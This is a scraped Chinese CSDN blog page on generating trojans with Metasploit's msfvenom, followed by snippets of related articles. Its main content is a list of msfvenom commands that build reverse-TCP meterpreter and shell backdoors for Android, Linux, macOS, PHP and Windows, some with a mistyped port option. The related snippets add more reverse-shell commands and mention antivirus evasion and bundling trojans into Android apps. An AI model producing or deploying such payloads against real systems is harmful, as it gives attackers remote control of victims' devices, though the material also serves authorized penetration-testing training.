利用msf框架生成常见的木马

最新推荐文章于 2024-08-08 10:32:49 发布
最新推荐文章于 2024-08-08 10:32:49 发布
阅读量1.8k 收藏 12
点赞数 2
分类专栏: # 工具的基本使用
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42035825/article/details/105047764
版权
本文介绍了如何使用msfvenom生成针对不同操作系统(如安卓、Linux、Mac、PHP等)的木马,并详细解释了常用参数,如载荷payload选择、编码免杀设置、文件输出格式等。同时,给出了监听代码示例,帮助理解如何配合exploit/multi/handler模块进行数据接收。
摘要由CSDN通过智能技术生成

常用木马

安卓app
msfvenom -p android/meterpreter/reverse_tcp LHOST=ip LPOR=8888 -o test.apk
Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=ip LPOR=8888 -f elf>shell.elf
Mac:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=ip LPOR=8888 -f macho>shell.macho
PHP:
msfvenom -p php/meterpreter/reverse_tcp LHOST=ip LPOR=8888 -o xx.php
exe:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.27 lport=8888 -f exe -o test.exe

常用参数:

–p (- -payload-options):添加载荷payload。载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT,就可以生成对应语言,对应平台的后门了!!!
–l:查看所有payload encoder nops。
–f

最低0.47元/天 解锁文章
Lion's Sin 艾斯卡诺
关注
专栏目录
渗透测试教学之MSF生成木马
weixin_45109326的博客
08-20 3590
msfvenom是msf中的一个独立的负载生成器,它可以利用msf中的payloads和encoders来生成各种格式的木马文件,并在目标机上执行,配合meterpreter在本地监听上线。msfvenom是msfpayload和msfencode的结合体,可以一步完成负载生成和编码免杀的操作。
使用Msfvenom生成Ubuntu 64位木马(反向连接、正向连接)
zhang35的博客
04-20 1万+
环境 攻击机:Kali Linux 2020.1 172.16.252.129 靶机:Ubuntu 16.04 172.16.252.138 生成木马 使用kali自带的Msfvenom工具生成木马。 查看有哪些linux下的载荷: msfvenom -l payloads | grep linux 针对Ubuntu 64位靶机,使用linux/x64/meterpreter/reverse_t...
Web渗透之MSF框架——msfvenom与免杀木马制作
Mr_Wanderer的博客
08-07 4704
文章目录生成常见的反向连接木马反向连接的优势:Windows:Linux:MAC:PHP:Asp:Aspx:msfvenom参数介绍生成免杀木马360免杀木马腾讯管家免杀木马免杀木马测试写在最后 生成常见的反向连接木马 连接一般分为正向连接和反向连接: 正向连接为: 对方服务器开放端口,让我们去访问 反向连接为: 我们开放端口,让对方访问。也就是让对方来找我们的端口 反向连接的优势: 1.某客户机中了你的网,但是它在局域网内,你直接连接不了。它的ip会动态改变,你不能持续控制。 2.由于防火墙等限制,对方
msfconsole生成安卓木马版本低
最新发布
mjy60的博客
08-08 421
打开AndroidManifest文件将 android:minSdkVersion="10"改为 android:minSdkVersion="16"android:targetSdkVersion="17" />改为 android:targetSdkVersion="23" />进入文件123中(我这里的名字是123)用vim打开AdnroidManifest.xml。在<application>标签上方添加标签上方添加。用apktool将文件反编译。
MSF生成木马木马的简单使用
爱喝水的仙人树的博客
11-03 9155
本文将介绍有关MSF木马模块的简单使用方式,介绍常见的几种木马生成方式,如有不对的地方,欢迎大家在评论区指正。由于本文仅对部分模块的简单使用进行说明,更多信息请参考官方网址MSFVENOM环境配置说明1. 使用kali虚拟机和Win7(可以低于此版本)虚拟机2. kali虚拟机建议使用最新版本并将系统软件更新至最新版本3. Win7虚拟机务必关闭网络防火墙,不建议使用Win7及以上版本系统,简单的木马会被直接删除4. 查看两台虚拟机的IP地址,确保两台虚拟机之间可以ping通。
msfconsole之制作windows木马并成功获取shell(正向payload)
2201_75387456的博客
05-27 856
还有⽐如 有⼀种情 况,⽬标处于深层⽹络,不能直接连通外⽹,也不能通过其他机器连通,因 为其他机器 防⽕墙都开着,为避免在有防⽕墙监控的情况下关闭防⽕墙⽽被发现,也只能⽤正向的⻢,然后通过开着防⽕墙的机器来进⾏端⼝的转发达到穿透的⽬的。set payload windows/x64/meterpreter/bind_tcp //生成exe时相同的协议。端⼝启⽤监听后,只会接收⼀次数据,⽆论成功或者失败,它 都不会再监听了!将生成的文件在靶机中打开,利用netstat -ano查看打开的端口。
使用msfvenom生成木马
wjwqp的专栏
03-28 641
使用msfvenom生成木马 Linux   msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf Windows   msfvenom -p windows/meter...
msf 生成.wsf 木马
Candour_0的博客
03-15 203
wsf脚本语言是Windows 脚本文件,是含有可扩展标记语言 (XML),支持javascript和vbs,Include 语句将函数从 VBScript 或 JScript 文件合并到 Windows 脚本宿主项目中。1)学习.wsf脚本格式2)msf生成vbs4)尝试运行查看是否报错5)反弹shell复制直接运行无报错监听:[外链图片转存中…(img-EMXGRgu0-1678810892161)]
msf漏洞利用
qq_43200478的博客
07-24 2610
msf漏洞使用(二) 1、网络服务器攻击渗透(MS08-067) 用到的靶机:win xp 1️⃣、启动kali,输入 msfconsole 出现下列界面 2️⃣、在msf框架下搜索msf08-067漏洞 search msf08-067 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-4Wzh3j9B-1595602652038)(#MSF.assets/1595579097351.png)] 3️⃣、选择编号为0的木马 use o [外链图片转存失败,源站可能有
MSF详解及常用命令之利用msf控制目标电脑
世间繁华梦一出
12-21 2587
MSF基本操作详解序言:MSF简介1、模块介绍2、基本命令3、后渗透4、msfvenom生成后门木马 ** 序言:MSF简介 Metasploit简称msf,Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 ** 1、模块介绍 它是一个渗透测试框架(模块介绍) auxi
0x09.第九课 Metasploit生成linux木马并尝试提权.pdf
06-24
本课程旨在通过实际操作,向学员展示如何利用Metasploit框架生成Linux木马,并尝试进行权限提升的过程。通过本课程的学习,学员将能够掌握以下技能: - 使用Metasploit生成针对Linux系统的恶意软件。 - 在成功植入...
kali系列-msf生成
qq_29437513的博客
07-21 910
生成exe , msfvenom -p/windows/meterpreter/reverse_tcp LHOST = 你的主机 ip ,端口 记得谈诺填了靶机端口就会运行出错 2. 正常加载后 查看任务管理器 出现了 3.metasploit 出现反馈 权限不够 ,下面查看不了版本号 ,可以利用ms 的漏洞,水平不够就只能这样了 。。。。 另外靶机要是 xp , win7 ...
红队攻防之特殊场景上线cs和msf
天行健,君子以自强不息
11-18 465
倘见玉皇先跪奏:他生永不落红尘
MSF生成后门木马
一醉一休的博客
11-19 2595
为了方便平时使用,记录一下操作命令
MSF利用
m0_73927535的博客
03-24 1080
漏洞检测程序,只检测漏洞是否存在:漏洞利用程序,真正发起攻击的行为,kali中集成了很多EXP,代码文件目录:/usr/share/metasploit-framework/modules/exploits:攻击主机主动去连接被攻击主机,比如我们的攻击机在内网环境,被攻击机是外网环境,由于被攻击机无法主动连接到我们的主机,所以就必须我们主动连接被攻击机了。但是这里经常遇到的问题是,防火墙对进入主机某些端口的数据限制是很严的,一般防火墙都是进口的数据限制严格,出口的数据限制相对没有那么严格。
msf-Msfvenonm生成后门木马
热门推荐
weixin_45588247的博客
08-27 1万+
msf-Msfvenonm生成后门木马实验 文章目录msf-Msfvenonm生成后门木马实验一、工具:二、实验环境:三、`msfvenom`简介:四、各平台生成木马的方法:五、生成反向反弹木马:1. windows平台:1.1 生成反弹木马:1.2 捆绑一个程序伪装木马:2. :3. :4. :1.1 :2.1 :五、实验过程:1. :1.1 :1.1.1 : 一、工具: Metasploit Framework(MSF)漏洞利用框架 二、实验环境: 靶   机: windows10虚拟机:192.
内网渗透-项目六外围打点
qq_50643984的博客
03-18 2335
1.外围打点 1.1拓补图 1.2发现主机 arp-scan -l 可以发现目标ip为192.168.31.138,nmap扫描端口,接下来绑定hosts域名,访问目标网站。 nmap -p- -sC -sV -O 192.168.31.138 -oA ip_port 注:-p为指定端口,可以先用masscan扫描开发端口,再用nmap。 绑定hosts,目标域名是www.webhack123.com vim /etc/hosts 直接按照图中添加就可以了。 1.3网站目录扫描 打开网站发现没有什
msfvenom备忘录
zhaji001
12-10 240
msfvenom -l Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f elf &gt; shell.elf msfvenom -p linux/x64/meterpreter/reverse...
msf生成捆绑安卓木马
05-27
在Metasploit中,可以使用以下步骤生成捆绑安卓木马: 1. 打开Metasploit控制台并输入以下命令启动msfvenom: ``` msfvenom -p android/meterpreter/reverse_tcp LHOST=<your IP address> LPORT=<your port> R > <output file name>.apk ``` 2. 将`<your IP address>`替换为你的IP地址,将`<your port>`替换为用于与受害者通信的端口号,将`<output file name>`替换为生成的apk文件名。 3. 运行命令后,msfvenom会生成一个APK文件,其中包含与你指定的IP地址和端口号进行通信的Meterpreter反向Shell。 请注意,生成的捆绑安卓木马仅供授权渗透测试使用,未经授权的使用是非法的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值